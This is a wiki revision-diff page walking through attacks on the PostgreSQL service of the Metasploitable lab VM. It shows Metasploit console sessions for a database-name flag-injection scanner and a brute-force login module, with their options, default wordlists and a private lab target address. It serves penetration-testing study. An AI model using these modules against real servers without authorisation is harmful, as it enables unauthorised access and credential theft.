Metasploitable/Postgres: Difference between revisions
From charlesreid1
| Line 25: | Line 25: | ||
</pre> | </pre> | ||
=Scanner= | |||
One of the first pieces of information you will need, even before running a brute-force attack on a PostgreSQL login, is a database name. | One of the first pieces of information you will need, even before running a brute-force attack on a PostgreSQL login, is a database name. | ||
| Line 31: | Line 31: | ||
Start with an exploit to obtain a PostgreSQL database name: | Start with an exploit to obtain a PostgreSQL database name: | ||
==Postgres dbname flag injection== | |||
Use the postgres_dbname_flag_injection exploit: | Use the postgres_dbname_flag_injection exploit: | ||
| Line 55: | Line 55: | ||
==Postgres Login== | |||
Like with MySQL, the Metasploit framework implements a brute-force login tool for PostgreSQL. | Like with MySQL, the Metasploit framework implements a brute-force login tool for PostgreSQL. | ||
Revision as of 01:04, 25 March 2016
This page covers activities on the Metasploitable virtualbox related to the postgresql service that is running.
Search for Exploits
msf auxiliary(postgres_version) > search postgresql Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection auxiliary/admin/http/rails_devise_pass_reset 2013-01-28 normal Ruby on Rails Devise Authentication Password Reset auxiliary/admin/postgres/postgres_readfile normal PostgreSQL Server Generic Query auxiliary/admin/postgres/postgres_sql normal PostgreSQL Server Generic Query auxiliary/scanner/postgres/postgres_dbname_flag_injection normal PostgreSQL Database Name Command Line Flag Injection auxiliary/scanner/postgres/postgres_login normal PostgreSQL Login Utility auxiliary/scanner/postgres/postgres_version normal PostgreSQL Version Probe auxiliary/server/capture/postgresql normal Authentication Capture: PostgreSQL exploit/linux/postgres/postgres_payload 2007-06-05 excellent PostgreSQL for Linux Payload Execution exploit/multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection exploit/windows/postgres/postgres_payload 2009-04-10 excellent PostgreSQL for Microsoft Windows Payload Execution post/linux/gather/enum_users_history normal Linux Gather User History
Scanner
One of the first pieces of information you will need, even before running a brute-force attack on a PostgreSQL login, is a database name.
Start with an exploit to obtain a PostgreSQL database name:
Postgres dbname flag injection
Use the postgres_dbname_flag_injection exploit:
msf > use auxiliary/scanner/postgres/postgres_dbname_flag_injection msf auxiliary(postgres_dbname_flag_injection) > show options Module options (auxiliary/scanner/postgres/postgres_dbname_flag_injection): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 5432 yes The target port THREADS 1 yes The number of concurrent threads <pre> msf auxiliary(postgres_dbname_flag_injection) > set RHOSTS 10.0.0.27 RHOSTS => 10.0.0.27 msf auxiliary(postgres_dbname_flag_injection) > set RPORT 5432 RPORT => 5432
Postgres Login
Like with MySQL, the Metasploit framework implements a brute-force login tool for PostgreSQL.
msf > use auxiliary/scanner/postgres/postgres_login msf auxiliary(postgres_login) > show options Module options (auxiliary/scanner/postgres/postgres_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DATABASE template1 yes The database to authenticate against DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RETURN_ROWSET true no Set to true to see query result sets RHOSTS yes The target address range or CIDR identifier RPORT 5432 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME postgres no A specific username to authenticate as USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt no File containing users, one per line VERBOSE true yes Whether to print output for all attempts msf auxiliary(postgres_login) >
Related
